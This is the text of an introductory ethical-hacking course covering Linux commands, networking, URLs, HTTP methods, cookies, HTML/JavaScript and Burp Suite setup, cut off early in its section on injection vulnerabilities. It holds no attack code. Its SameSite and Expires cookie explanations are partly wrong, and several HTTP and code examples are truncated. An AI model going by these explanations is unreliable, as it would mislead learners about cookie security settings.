Ethical Hacking ABC
Ethical Hacking ABC
Basics
In this section, we will cover the basics of IT, focusing on the command line, computer
networks, and the fundamentals of websites. The aim is to provide everyone with the
tools to progress in the course as well as develop their own IT skills. The course topics
have been selected and summarized in a way that we hope will provide the best
foundation for further learning opportunities.
Spend time on this section!
If you already have experience in the topics of the course and you understand them
well enough, you can definitely try other courses. But if you are a novice in the field of
information technology and the terms of the course sound unfamiliar, this course is for
you. The purpose of the course is to facilitate the learning curve and clarify certain
basic principles on which other courses are built upon.
A few things about hacking
In order to learn how to find cybersecurity vulnerabilities in systems, you need to first
understand how the systems work. This reality also applies to the toughest
professionals in the cybersecurity field. In movies, hacking happens magically in just a
few minutes, as if there is a clear formula to follow. This is not true in the real world.
Every cybersecurity professional first spends a lot of time getting to know the target
and understanding its operation. It is essential to understand the basic rules and
principles on which everything operates.
What is ethical hacking?
History of Hacking
Hacking is a term that is thousands of years old and it refers to cutting something
fiercely and violently, and it is not naturally associated with technology because there
was no technology. According to one source, the term hacking has also been used
among model train enthusiasts, before computers.
However, modern-day hacking originated in the 1950s when technology enthusiasts
explored and experimented with telecommunications infrastructure, namely landline
telephones. A well-known trick back then was whistling into a paid landline phone to
manipulate the system and make free calls. This field of study was known as Phone
Phreaking, and individuals who engaged in it were called Phreakers.
Technology advanced and computers as well as computer networks began to be used
widely. In the same way, the Phone Phreaking culture transitioned into computers and
computer networks. It is good to understand that at that time there were no laws or
understanding that this could be used for malicious purposes. Similarly, these
enthusiasts were not operating from a harmful perspective, so to speak. It was just a
group of people who had a great interest in the subject area and what could be done
with this new and ever-evolving technology.
With few exceptions, hacking as a means for financial gain or harm reached new scales
only when companies realized that the Internet can be used for business operations
and internet commerce became a booming industry. This also created the need to
protect customer and system information. Since then, the entire field of hacking has
been a cat-and-mouse game, where attackers come up with new ways to breach
systems and defensive individuals try to patch vulnerabilities and invent new ways to
defend systems.
At this point, the concept of an ethical hacker comes into play.
What is a white hat hacker?
Ethical hacker, white hat hacker, refers to a person who knows how to break into
computer systems - just like a computer criminal does. Instead of engaging in illegal
activities, however, a white hat hacker helps, for example, companies to discover
vulnerabilities before criminals find them.
An experienced professional can also advise a company on how to improve the security
of systems, people, buildings, and processes in order to make the work of criminals
more difficult. This is important because security does not mean that there are no
vulnerabilities in the application. Security rather means that even if there is a
vulnerability in the application, it does not cause significant damage until the attack can
be detected and mitigated.
How do white hat hackers earn their living?
Cybersecurity is currently at the forefront of almost every company's daily operations,
and Finland has a wide range of different cybersecurity professions. These include
technical cybersecurity consultants who perform information system penetration
testing.
In addition to job positions, many companies have so-called bug bounty programs, in
which the company gives permission (either to anyone or to specifically invited
hackers) to search for vulnerabilities, for example, on their own website and then
rewards the findings.
Bug bounty programs
Bug bounty programs refer to the practice where a company grants permission to
private cybersecurity professionals to search for vulnerabilities in the company's
systems. Typically, the company specifies what, where, and how can be tested,
according to which private professionals search for these vulnerabilities, or "bugs," as
they are also known. Often, a monetary reward is given for the discovered vulnerability.
In fact, there are people in the world who make a living solely by creating and
participating in these programs, as significant rewards can be paid for serious
vulnerabilities.
Bug bounty platforms, such as HackerOne or Intigriti, are platforms where these
programs are aggregated, and all communication with the company in question takes
place on the platform.
However, it is important to remember that cybersecurity testing and bug bounty
programs differ slightly. Bug bounty programs rarely pay for anything that does not
have a direct impact on their operations. This means that significant security
vulnerabilities, as well as smaller ones, may be overlooked in these systems. On the
other hand, the goal of cybersecurity testing is to find as many vulnerabilities as
possible, but also to identify areas for improvement. In cybersecurity testing, the aim is
to ensure that even if a vulnerability is found, the resulting damage can be minimized.
Important warning
When you have learned to search for vulnerabilities, you will notice that there are
actually quite a lot of them, and it is not difficult to find vulnerable targets online.
However, it is extremely important that you never carry out any kind of attacks, or
even try whether the application is vulnerable, if you do not have legal permission
for it. Committing a data breach can result in fines or imprisonment, but above all, you
can ruin your chances of getting a job in the field.
There is no sense in throwing away the possibility of getting to hack all day for a living,
learn from colleagues and become a top expert in the field due to foolishness. Not to
mention the kind of mental suffering that data breaches cause to both those whose
information has leaked into the hands of who knows who, and to those who were
responsible for protecting the data.
So let's stay on the right path!
First encounter with the command line
The Linux command line is a text-based program that provides an interface between
the user and the operating system. The command line usually runs a command
interpreter program that handles the execution of commands entered on the command
line. There are many different command interpreter programs, but one of the most
common is Bash, also known as the Bourne Again Shell. The command line is used
through text-based commands, unlike graphical applications where the user interacts
with a mouse. This gives rise to the definitions of CLI, which stands for Command Line
Interface, and GUI, which stands for Graphical User Interface. Almost all possible tasks
can be performed on the command line, often faster than using graphical tools.
Additionally, it also supports automation, allowing you to run multiple commands at
once, which is useful, for example, in cybersecurity testing.
The command line allows for unlimited different use cases and speeds up many tasks,
but the best way to learn how to use the command line is to boldly try it out yourself.
Notice the text that ends with a dollar sign. This is called a prompt, and it tells you that
the command line is ready to receive commands. It is important to understand that
when you run a command, the output produced by the command is almost always
displayed directly on the command line, and when the command is finished, the
prompt appears again. Depending on the command, a lot of text can appear, while
sometimes no text may be printed at all.
Job Directory
A working directory refers to the location in the file system where your command line
operates. It is important for the command line to maintain information about the current
working directory, as it needs to be able to create, modify, and delete files and
directories. This would not be possible if the command line doesn't know where these
operations should be performed. By default, the command line creates, modifies, and
deletes files that are located in the current working directory of the command line.
Write the following command and press enter.
pwd
This should return your current working directory, which is the path to your home
directory. pwd stands for print working directory and literally translated, it means: print
the current working directory. So if you ever want to know your current working
directory, use the pwd command.
Command Line Navigation
The location of the working directory can be changed with the cd command, which
stands for change directory. The cd command takes a path or directory name and
changes the working directory to this new location.
cd kansio
The image below shows how the command line's working directory was changed to
point to the root of the file system. Then, the location pointed by the working directory
was checked using the pwd command.
Unlike the Windows operating system, Linux does not separate different disks under
their own letters. / directory, also known as the root directory, is the root or base of the
file system. You can think of it like the familiar C:/ in the Windows world is the same as
/ in the Linux world, with the exception that in the Linux world, nothing is located, for
example, under the D:/ disk, but rather everything is found under the root.
The ls- command comes from the word list and simply lists the files and directories in
the given path.
ls /home/
Simply giving the ls command to the command line lists the folders and files under the
current working directory. The command can also be specified with a path to list the
files located beneath it.
The command "ls" is executed in the root of the file system in the image below, and
the -l flag is used in the command to provide a more user-friendly listing.
When it is desired to move the working directory upwards in the folder structure
(referred to as moving closer to the root), this can be indicated by using two dots.
cd ..
In the image below, first the pwd command is executed and it can be seen that the
current working directory points to /home/student-path. Then, with the cd command,
we move one directory up and confirm the change of the new working directory again
with the pwd command.
In the image below, the current location of the working directory is first checked. After
that, we move directly to the root without going through the /home directory. Finally,
we ensure that we are in the root.
Finally, by entering only the cd-command, the working directory will be changed back
to your home directory. So in this case, to the /home/student directory.
Folder creation
You can practice the taught commands on the command line at the bottom of the
page. Finally, perform the given tasks on the same command line.
Next, we will practice working with folders. Let's start by creating a new folder using
the mkdir command. The command stands for make directory, which means create a
folder.
mkdir kansio
In the image below, we created a new folder named "exercise" and confirmed that it
was created successfully with the "ls" command.
It is also possible to create multiple folders by specifying them one after another on the
mkdir command.
mkdir kansio1 kansio2 kansio3
In the image below, we created two new folders and ensured that they were created
successfully.
New folders can also be created nested by giving the mkdir - command the -p - switch.
mkdir -p kansio1/kansio2/kansio3
In the image below, we created two nested folders and confirmed the success of the
command by running the ls command from inside the first folder.
In the image below, we created a new file using the touch command and confirmed the
success of the command by using the ls command.
When you want to see the contents of a file on the command line, it is possible to use,
for example, the catcommand. The cat command comes from the word concatenate,
which means to link together or join together. In practice, the command simply prints
the contents of the file to the command line.
cat tiedosto.txt
In the image below, we tried to print the contents of two different files using the cat
command. One of the files was empty, and the other was not.
There are several different editing programs for editing text-based files, such as vim,
emacs, and perhaps the most famous one, nano. Nano is the simplest to use out of
these three and the easiest way to start editing on the command line, so we will use it
in this course for file editing.
You can launch the nano program by giving it an existing file name. Alternatively, you
can also give it a new file name, in which case nano will create that file.
nano tiedosto.txt
The nano program opens up on the command line, which allows you to freely write into
the file. When you are ready, you can close the program and simultaneously save the
file by pressing ctrl + x and y + enter. You can check the content of the edited file using
the cat command.
Below is a picture of the nano program.
It is possible to redirect output using the Linux command line, for example, to a file.
This is done by using the < or > characters.
echo "Teksti menee" > tiedostoon.txt
By using a single > sign, the command line overwrites all existing content in the file. If
you want to redirect the output to a file without overwriting existing content, use two
>> signs.
In the image below, we redirect two outputs to a file. We notice how using a single
greater-than sign (>) overwrites the file and how using two (>>) appends to the end of
the file. It is important to note that if the file does not exist before redirection, the
command line will create a new file.
Redirecting output may seem simple and even unnecessary at this stage, but it is an
important part of command line usage. For example, you could redirect the output of
one command to the next command.
Moving Files and Folders
Renaming files and directories as well as moving them can be done using the mv
command, which stands for move.
mv vanha.txt uusi.txt
In the image below, we are renaming the file.
Using the same principle, you can move files or folders by first specifying the original
location and then the destination.
# siirtää tiedoston kansioon
mv tiedosto.txt kansio/
In the image below, we first move the file named file2.txt to a folder, and then we move
both txt files back to the current working directory using the wildcard character (*) and
dot.
Deleting Files and Folders
You can use the command line at the bottom of the page to practice commands.
Finally, complete the given tasks.
File deletion is done using the rm- command, which comes from the word remove.
rm tiedosto.txt
In the image below, we first remove two txt files with the rm command and finally
remove the last remaining file. We could have also removed all files by executing rm *.
Deleting folders differs slightly from files, as using only the rm- command does not
allow for folder deletion. There are two ways to delete folders depending on the
situation. You can delete an empty folder using the rmdir- command.
rmdir kansio
If the folder is not empty, you can use the rm command with the -r option. The -r option
deletes the folder and all the folders and files inside it. The rm command also has the -
d option, which deletes the folder only if it is empty, similar to rmdir.
rm -r kansio # poistaa kansion ja kaiken kansion sisältä
rm -d kansio # poistaa kansion jos tämä on tyhjä
rmdir kansio # poistaa kansion jos tämä on tyhjä
In the image below, we first remove the folder named "kansio2" using the rmdir
command. After that, we try to delete the folder named "kansio" and find that it is not
empty. Then, we delete the folder and the file it contains using the -r option.
This module lists some use cases for commands, but we recommend familiarizing
yourself with and freely experimenting with commands. These can be safely tested in
a lab environment.
File system permissions
You can use the command line at the bottom of the page to practice commands.
Execute the given tasks on the same command line.
Finally, let's go over file system permissions, that is, how file and folder permissions are
interpreted and defined in a Linux environment.
You can get a listing similar to the image by using the -l switch in the ls command.
In a Linux environment, both files and directories have permissions defined (inside the
orange box) and an owner-user as well as an owner-group (inside the blue box).
Let's start with the owners. Each user belongs to a group. So, as shown in the picture,
the owner-user of each file is student (on the left) and the owner-group of each file is
student (on the right).
-rwxr-xr-x 1 bob staff 72 Jun 6 19:49 test.sh
By default, the group is the same as the username, and only that user belongs to the
group. However, this can also be defined differently. For example, the owner user of the
test.sh- file above is bob, and the owner group is staff.
The file permissions are interpreted as follows:
Rights are defined into three categories: owner's rights (orange), group's rights
(green), and others' rights (blue). The example rights thus allow that.
The owner-user can read, write, and execute the specified file.
The owner group can read and execute the file in question.
Other users can read and execute the specified file.
Note! - Exceptionally, the directory must always have an execution permission if it is to
be used as a working directory.
The file permissions can be interpreted in two different ways. Either read, write and
execute or in octal, also known as numerical.
Numerical interpretation is done as follows.
Read (r) - 4
Kirjoita (w) - 2
Execute (x) - 1
For example, if the file permissions were rw- rw- r--, the permissions would be
interpreted numerically as 4+2 = 6, 4+2 = 6, and 4. In practice, the permissions rw-
rw- r-- can also be interpreted as 664.
rw- or 6 - owner can read and write
rw- or 6 - the owner group can read and write
r-- or 4 other users can only read
The chmod- command comes from the words change mode and it is used to define
file and directory permissions. This can be done, for example, like this:
chmod 664 tiedosto.txt
The chown command comes from the words change owner and it can be used to
define both the owner and the owner group for a file. This is done as follows:
chown omistaja:ryhmä tiedosto.txt
Internet addresses
Website address
In order to successfully communicate online, we need a way to identify and determine
the location of the device on the network. We also need a way to distinguish between
networks. The concept is very similar to a traditional home address and a combination
of numbers and letters that identify individual apartments. For example, all the
apartments in one residential complex are located at the same address and are
distinguished from each other using a number and/or letter.
Domain
Since using the above mentioned IP addresses in everyday life would be impractical
and difficult, a concept called a domain name has been developed. Domain names,
such as google.com or hakatemia.fi, are simply easier-to-remember equivalents of IP
addresses.
Localhost - My computer
Localhost or the corresponding IPv4 address (127.0.0.1) is the computer's own IPv4
address, and it can only be accessed by the computer itself. Localhost is a network
address assigned to the computer, so it is not an IP address that is accessible on the
internet. Typically, a computer has at least two different IP addresses: one mentioned
as 127.0.0.1, and another that allows your computer to communicate with, for example,
your home modem. Whether you are connected to the network, such as via Wi-Fi or
without a network, your computer always has the address 127.0.0.1. So, for example,
you can maintain a website on your computer that can be accessed from a browser by
using that localhost address.
Address 0.0.0.0
Address 0.0.0.0 is an address that typically appears in routing tables and port listings.
This address refers to all addresses at the same time. For example, if your device is
connected to multiple networks (such as WiFi and cable), you can set a service on your
computer to be open to all available networks by setting the service to listen to the
address 0.0.0.0. It is important to understand that you cannot actually connect to this
address; you need a specific address for that.
Client-server model
The client-server model is an architecture in which terminal devices are connected to
server programs. For example, when retrieving a webpage, the browser is the client
that contacts the WWW server, resulting in the WWW server returning the webpage to
the browser. This retrieval is done using either the HTTP or HTTPS protocol, but the
same implementation model also applies to other protocols. Protocol refers only to the
instruction that defines how the client and server communicate with each other. The
protocol indicates the format in which the request message must be sent and the
format in which the server program's returned response must be, so that the client can
interpret this response correctly and communication can continue without disruptions.
Ports
Since a single server can provide users with many different server applications, such as
websites, email services, remote access services, and countless other services, the
client and server must have a way to distinguish these different channels from each
other. This is where the concept of ports comes in. Ports are, in essence, just different
routes through which messages can travel and are an extremely important concept for
the functioning of computer networks.
It is important to understand how protocols, ports, and the client-server model are part
of the same entity. The client-server model describes the operating model of how a
client, for example a browser, requests a web page and the server responds to this
request by returning the web page to the browser. Ports, on the other hand, are
channels through which this request can be implemented, and the protocol instructs
the format in which this request and response should be.
Client-side and server-side
The browser and server sides refer to two different areas that are responsible for the
functioning of a website. The browser side covers everything that is visible to the user
or with which the user interacts. This generally refers to the user interface of a website.
From the perspective of the client-server model, the browser is the client that presents
the user with the web page interface. When a user visits a web page, the browser
makes a request to the web server, which returns the interface to the browser.
All information on the browser side is called the browser side (frontend) in English. This
includes, for example, images, text, colors, styles, buttons, icons, and practically
everything that the user interacts with in some way.
The task of the server side (also known as backend) is to provide a user interface and
support the functionality of the browser side. For example, when you register on a
website, you fill in your user information on a registration form. Afterwards, the browser
sends the information to the server, which can, for example, verify the correctness of
the given information and check that the same user does not already exist. After this,
the server can create a new user in the database with the provided information. The
actions happening on the server side are naturally invisible to the user.
URL structure
What is a URL address?
URL stands for Uniform Resource Locator and is one of the cornerstones of the HTTP
protocol. In its simplicity, a URL refers to an individual resource on a web page, which
can be, for example, an HTML page, a resource used by an HTML page, or even a plain
text file.
Different types of URL addresses:
http://hakatemia.fi/
http://hakatemia.fi/index.html
http://hakatemia.fi/robots.txt
https://hakatemia.fi/kuva.png
https://hakatemia.fi/kansio/tiedosto.txt
https://hakatemia.fi/rekisteroidy?nimi=aku&sposti=aku.ankka@g
Parts of a URL
URL address consists of different components, some of which are mandatory, while
others are optional. The components used in the URL address are partly defined by
application developers, although the user is able to modify them themselves.
The application may, for example, contain a link where the application defines the
desired URL address and the components contained within it, but nothing prevents the
user from changing this address.
Schema
The first component in the URL address is the schema. The schema tells the browser
which protocol the request is executed with. The protocol is usually an unprotected
HTTP or a secure HTTPS protocol.
Authority or Domain
The part following the schema is the name of the authority maintaining the resource,
which is the domain. As mentioned in the section about computer networks, a domain
is just a more easily memorable name for an IP address, so an IP address can also be
used directly instead of a domain name.
Authority tells the browser from which server the resource is to be retrieved. For
example, www.google.com tells the browser that the resource is to be fetched from
Google's server, so the browser naturally tries to communicate with Google over the
network.
Port
After the authority and port, it is possible to specify the resource path to which the
HTTP request is targeted. The resource path can be thought of as the file path of a web
server.
However, this is not as simple in modern times because resource paths are often
abstractions nowadays, where different resource paths or "routes" of a webpage and
the requests to these are handled in code, and the paths are not concrete files.
Parameters
Parameters are alternative key-value combinations that come after a question mark
and are separated by the &– symbol. A website can use these values defined in the
parameters if desired. The use and handling of the parameters are entirely at the
discretion of the website creators, and their usage varies widely.
Parameters are a significant way to transmit detailed information between the browser
and the application. Therefore, the parameters in use are also of interest from a
cybersecurity testing perspective. Many vulnerabilities arise from applications not
handling the values contained in parameters correctly.
Anchor
Anchor is the last piece of the URL address, which is also completely optional. Anchor
tells the browser which specific part of the requested resource should be displayed to
the user. So, if the requested resource were for example a recipe, then the anchor
could be #measurements, which would automatically navigate the browser to that
specific section once the resource is loaded in the browser.
HTTP protocol
What is the HTTP protocol?
HTTP is primarily a protocol used by web browsers, which both the browser and the
web server hosting the webpage must respect. The HTTP protocol defines how
communication between these two should occur, so that both parties can understand
each other's needs correctly.
When the browser visits a website, the browser sends an HTTP request to the web
server according to the client-server model. Upon receiving the request, the web
server sends an HTTP response to the browser, typically containing the requested
page.
HTTP Request Structure
The HTTP request sent by the browser consists mainly of the HTTP method, resource
path, HTTP protocol version, and HTTP headers.
Depending on the HTTP request method, the query may also include an HTTP body
(known as the HTTP body). This is used when data needs to be passed from the
browser to the application. For example, when a user logs into an application, the
HTTP request made by the browser typically uses the POST method and the login
information is transferred in the HTTP body.
Structure of HTTP response
In an HTTP response, the website/server returns the HTTP protocol version used, along
with the status code, HTTP headers, and the requested resource.
The HTTP response returned by the server can contain, for example, HTML code that
the browser converts into a visual format, but this is not required. The information
contained in the HTTP response is entirely at the discretion of the application builder.
HTTP methods
The HTTP protocol enables the use of different request types or methods, which refer
to different tasks that the client (browser) wants the web page to perform. For example,
if a user saves data to a web page, such as user information, it is expected that the
browser does this using the POST, PUT, or PATCH method. However, since the
operation of the web page is completely in the hands of the developer, the browser can
make this storage request using almost any request type, but this is against best
practices.
HTTP methods can be thought of as actions that change or read the state of a
webpage.
It is also important to understand that the use of these different methods also affects
the format of the HTTP message.
GET method
The GET method is definitely the most commonly used HTTP request type and the
default request type that the browser sends, unless otherwise specified for the
browser. So the browser defaults to using the GET request type, for example, when
navigating by clicking in the browser.
With a GET request, the browser typically requests the webpage to return the
requested resource.
Below is an example of what a GET request might look like. This particular GET request
occurred when the browser directly navigated to the address
https://www.hakatemia.fi/.
HTTP-PYYNTÖ
GET / HTTP/2
Host: www.hakatemia.fi
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
POST method
Unlike the GET method, which is intended to retrieve information or resource, the POST
method is designed for sending data from the browser to the web page. The POST
request can contain an HTTP body where the data is located.
The following POST request is an example of what a POST request may look like when
you log in to a website.
HTTP-PYYNTÖ
kayttajatunnus=teppo.tavis@hakatemia.fi&salasana=salasana123
PUT method
PUT request type can be used for the same purpose as POST, but its original idea was
to be a request type that replaces a desired resource with another. Unlike POST, which
is intended to store individual information, such as a user, the idea behind the PUT
request type was to replace an entire entity or resource with another one. But as
already mentioned, the usage of HTTP methods and the behavior of a webpage with
these different request types is completely up to the webpage developer.
In the following PUT request, the user signs up for Hakatemian's email list.
HTTP-PYYNTÖ
{"email":"teppo.tavis@hakatemia.fi"}
DELETE method
The purpose of the DELETE request type is simply to delete a resource or entity. This
may be used, for example, in various API interfaces. More information can be found
here.
The DELETE request below could, for example, remove the user's profile picture.
HTTP-PYYNTÖ
PATCH method
The basic idea of the PATCH method is to make partial changes to the desired
resource. Unlike in the case of the PUT method, the purpose of PATCH is to modify the
resource only partially.
The following PATCH request could, for example, change the user's name.
HTTP-PYYNTÖ
{
"kayttaja": {
"id": 12345,
"Name": "Teppo Tavis"
}
}
OPTIONS method
The purpose of the OPTIONS method is to request allowed communication methods
for the specific resource from a web page. The response from the web page typically
includes a list of allowed HTTP methods. The OPTIONS method is also used in the
CORS (Cross-Origin Resource Sharing) mechanism, which allows web pages to
transmit information through the browser.
HTTP-PYYNTÖ
HEAD method
The HEAD method asks the website to return a response that is exactly identical to the
case of the GET method, but without the requested resource. So the website is asked
to return only the response status code and headers.
HTTP-PYYNTÖ
HEAD / HTTP/2
Host: www.hakatemia.fi
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
There are several HTTP request types, and as can be seen from the mentioned
methods above, their purposes are partly very similar, and there is no risk if the
developer decides to use, for example, the PUT method instead of the POST method
for data storage. However, these are only requests that the browser sends to the
website, hoping for a certain response. In theory, it is completely possible to build a
website that behaves completely opposite to what the HTTP protocol is intended to be
used for. This is entirely up to the developer.
HTTP Headers
HTTP headers are part of both the HTTP message sent by the browser and the
response returned by the website, and they contain additional information and
instructions.
In an HTTP request, headers can provide information to a website, such as the type of
device making the request, so that the website can tailor the response to fit the device.
Headers are also used, for example, for authentication and maintaining login status, as
well as for many other purposes. Good examples are the Content-Type and Content-
Length headers, which indicate the format and size of the data sent by the browser.
Headers in HTTP responses serve the same purpose as in the requests. They allow a
website to provide additional information about the returned data and provide
instructions to the browser on how it should behave.
In the following HTTP request, the highlighted fields are interpreted as HTTP headers.
After the HTTP headers, the actual data that the browser sends to the website follows.
In the following HTTP response, the highlighted fields are interpreted as HTTP headers.
After the HTTP headers, the HTTP body returned by the web page comes.
Cookie directives
Cookies are always associated with parameters or "additional instructions", which the
browser uses to understand how to use the cookie in question. These are called
directives and can be defined on behalf of the website during the cookie storage. If
these are not specified, the browser will use default values p rogrammed for it. Below
are listed a few directives.
Expires
Expires-directive is optional and determines how long the cookie is active. If not
specified, the cookie remains active until otherwise defined.
Max-Age
The Max-Age directive can be used to specify how long a cookie is in use, using
seconds. This is also optional.
Domain
The Domain Directive can be used to determine the name of the web page that
owns the cookie. However, this cannot be specified for other web pages than one's
own, as it would be a security issue. If this is specified, cookies are also sent to all
subdomains of the web page. For example, the subdomain of the hakatemia.fi web
page could be testi.hakatemia.fi.
Path
With the Path directive, a more specific path can be given, causing the cookie to be
included. For example, if the Path value was /x, then the cookie would only be sent
when the browser communicates with the /x path.
Secure
Secure Directive is a cybersecurity directive that can prevent the sending of cookies
over an unprotected HTTP protocol. If the directive is set, the browser will send the
cookie only over the secure HTTPS protocol.
SameSite
SameSite-directive is a cybersecurity directive that can prevent sending cookies
when the origin of the HTTP request is different from the request recipient. This
prevents, for example, CSRF (Cross-Site Request Forgery) attacks, where malicious
pages attempt to make changes to other services for which the user has an active
session. By default, this is set to Lax mode. SameSite-can be set to three different
states: None, Lax, and Strict. None is the same as not using this feature, Lax allows
everything except navigation through links. Secure also prevents navigation through
links and can often break the usability of the website.
HTML Markup Language
HTML (HyperText Markup Language) -markup language is the language used to
visually build web pages. Unlike programming languages, HTML is used to inform the
browser about the structure and content of the web page, but it does not itself execute
code. HTML is one of the fundamental pillars of web development (and testing) and is
therefore very important to understand for this course.
HTML, therefore, informs the browser of what and how it should display desired
content visually, and this is done by using HTML elements. You can think of an HTML
element as a Lego brick, which you can combine to build anything.
For example, we can tell the browser that we want a large text, with an image below it
and a link to Hakatemian's website below it.
<html> <!-- HTML sivun alkamista indikoiva elementti-->
</html>
You can copy the above HTML code to a file named test.html and open it in your
browser. You will see something similar.
You can also view and edit the HTML code of other pages in your own browser. For
example, with Google Chrome, you can navigate to the desired page, right-click, and
select Inspect.
CSS
CSS (Cascading Style Sheets) is a style language designed to support the content
defined in HTML. Both HTML and CSS are intended to define the visual appearance of
a webpage, where HTML defines the structure and content of the webpage, while CSS
tells the browser how that content should be displayed.
You can, for example, use CSS to define a background image for a website.
<html>
<head>
<!-- style elementti kertoo selaimelle, että tämän sisält
<style>
body { background-image: url("https://cdn.pixabay.com/p
</style>
</head>
<body>
<h1>Iso teksti</h1>
<a href="https://www.hakatemia.fi/">Hakatemiaan!</a>
</body>
</html>
In the module, only a basic understanding of what HTML is and how it works is
provided. You can find more material on HTML, for example, here. There is also an
HTML playground below where you can freely explore the secrets of the HTML
language.
HTML Leikkikenttä
<h1>Hei vaan kaikki.</h1>
JavaScript
JavaScript is primarily a browser-based programming language used to make web
pages more interactive. JavaScript is used, for example, on the server side as well as in
phone applications, but in this module, we only focus on using JavaScript in browsers.
Every commonly used browser supports JavaScript, which is why most web pages also
use JavaScript to some extent, and this cannot be ignored if you want to learn the
basics of web pages.
JavaScript can be executed in the browser primarily in two different ways: either by
writing JavaScript directly into HTML code or as a separate file.
JavaScript within HTML code. The example in question displays an alert window to the
user, which reads "Hello World!".
<html>
<head>
<title>JavaScript esimerkki</title>
<script>
alert("Hello World!");
</script>
</head>
</html>
JavaScript in its own file. This example does the same as the example above. The file
alert.js contains the JavaScript code.
<html>
<head>
<title>JavaScript esimerkki</title>
<script src="alert.js"/>
</head>
</html>
In this module, only a basic understanding of what JavaScript is and how it works is
provided. More information about JavaScript programming can be found, for example,
here.
A few words about the tools
In cybersecurity testing, the purpose of tools is to either automate laborious tasks or
provide better visibility into the usage of the target being tested. Often, both are used.
The choice of tool used in testing depends entirely on the need, usually the target
being tested. Most situations and problems already have the necessary tools written by
someone, but occasionally there may be situations where the need is so unique that
the tester must write their own tool to solve the problem. However, when it comes to
browser-based applications (websites), one of the most commonly used tools in the
field is the BurpSuite software. BurpSuite allows the tester visibility and the ability to
modify the traffic between the browser and the website, as well as several other
functions based on this core idea. You will almost always need the BurpSuite software
when testing websites, so we recommend becoming proficient in using this tool.
Burp Suite: installation
As mentioned in the previous module, Burp Suite allows you to see and modify the
communication between the browser and the website on the fly. This means that the
Burp Suite software needs to be able to come between these two parties. However,
first the software needs to be installed.
BurpSuite Community Installation
There are three different versions of the Burp Suite software:
BurpSuite Community
Free version with limited functions.
BurpSuite Professional
Paid version, which includes, for example, a built-in scanner whose task is to
automatically find vulnerabilities on websites.
Burp Suite Enterprise
Version intended for businesses, which includes even more features, such as the
ability to use the BurpSuite tool programmatically.
We will be using BurpSuite Community version in the platform material. Although the
free version lacks several interesting functionalities, it still includes everything essential
for discovering and exploiting any vulnerabilities.
You can download and install the BurpSuite software from here. Launch the program
after installation. After launching, BurpSuite will ask you what kind of project you want
to create, but since we are using the free version of the software, you can only create a
temporary project, so you can continue by pressing the next button. Next, the program
will ask you if you want to use the program's default settings or use a configuration file.
The default settings are acceptable, so press the Startup Burp button.
After the initial stages, the BurpSuite program should start normally.
First touch to the BurpSuite program
From the BurpSuite program, you will find many different functions and levers, but
don't let this discourage you. You will quickly learn to use the BurpSuite program and
you will often find that you only need a few functionalities in your daily use. Next, we
will go through a few core functionalities that the BurpSuite program supports and
what the tool's usage is based on.
Recording of HTTP messages
Start by going to the Proxy page and clicking the Open Browser button. This will open
the chromium browser, which is configured to redirect the browser's traffic to the
BurpSuite program. Once the browser is open, go back to the BurpSuite program and
make sure that the capture of HTTP requests on the Proxy page is enabled ("Intercept
is ON"). Then return to the browser and try to navigate to the address
https://www.hakatemia.fi/.
You notice that the browser is loading that page. Go back to the BurpSuite program.
The Proxy page should now display the HTTP request we caused.
Proxy is in intercept is on mode, which means that every message caused by the
browser is intercepted and displayed to the user. We can manipulate the request, block
the request, or forward it to the website using the Forward button.
We can also set the Proxy program to passive mode. When the program is in passive
mode, it does not stop messages, but instead saves the message and automatically
forwards it. Set the program to passive mode by pressing the Intercept is on button.
Please note that https://www.hakatemia.fi is successfully loaded in the browser.
Next, go to the Target page. On the left, you will see a list of all the websites that the
browser has made requests to.
Target identification
Notice that transitioning to the Hakatemia website has caused multiple queries. This is
because the Hakatemia website uses various resources that are maintained on other
websites.
These resources can include, for example, images, videos, style sheets, JavaScript
libraries, etc.
You will notice that because websites often have many dependencies on resources
that are loaded from other addresses, it would be more practical if we could set the
BurpSuite program to focus only on specific websites, as we do not want to
accidentally focus on testing the wrong website.
Target the BurpSuite program to focus only on the desired target by right-clicking on
the addresses listed on the left side of the page, https://www.hakatemia.fi, and select
Add to scope. Next, BurpSuite will ask if you want to stop recording traffic from other
websites, to which you can answer yes, that is, yes.
Now we have defined the target, meaning that the BurpSuite program no longer saves
traffic caused by other websites. Next, we want to display only the Hakatemia website
on the Target page. Press the Filter button, select the Show only in-scope items box,
and press the Apply button to save the filtering setting.
Show the tree structure recorded by the BurpSuite program of the website
www.hakatemia.fi- by pressing the left arrow key on the list.
Repeater
One of the most commonly used tools in the BurpSuite program is the Repeater
functionality. With this, we can easily modify and send HTTP requests and see how the
website responds to these requests.
You can transfer an HTTP request to the Repeater page by right-clicking on the HTTP
request saved by the BurpSuite application and selecting Send to Repeater.
After this, go to the Repeater page. You will see the selected query on the left side and
an empty response view on the right side. Press the Send button. This instructs the
Burp Suite program to send the corresponding HTTP request to the website and
retrieve the response.
Next, try modifying the HTTP request by editing the resource path after the GET
directive and setting the path to /test.
Please note that the requested page cannot be found on the website
https://www.hakatemia.fi and the webpage returned an HTTP response of 404 Not
found.
Summary
We have now gone through how to install BurpSuite program and how to use it to
capture and replay browser-made HTTP requests.
We strongly recommend boldly experimenting with the different functionalities of the
tool and freely searching for more information on the possibilities offered by the tool.
Vulnerabilities
Vulnerability refers to some kind of weakness or deficiency that allows an attacker to
do something in the system that developers did not intend to be possible.
Vulnerabilities are usually aimed at stealing information or causing harm, either on a
user-specific or a broader level, such as crashing a website. Sometimes, by exploiting a
vulnerability, the goal is to gain control over the system, which is then used only as a
tool in larger attacks against other applications or organizations.
However, it is important to understand that vulnerability and hacking are to some extent
subjective and situation-dependent definitions. A vulnerability in one system can
sometimes be functionality in another system. For this reason, it is important to
understand the system functionalities and have enough knowledge of the "context" to
be able to identify anomalies.
Since there are relatively many different vulnerabilities, but the natures of vulnerabilities
are very similar, we have done our best to condense vulnerabilities into five different
groups.
2 - SQL injections
Injection
Injection usually refers to a vulnerability through which an attacker sends input to an
application that breaks or changes the structure of a query controlled by the
application. Good examples of these are SQL injection vulnerability, where an attacker
manipulates a database query executed by the application, and XSS injection, where an
attacker manipulates the structure of an HTML response returned by a web
application. A common requirement in injection vulnerabilities is that the application
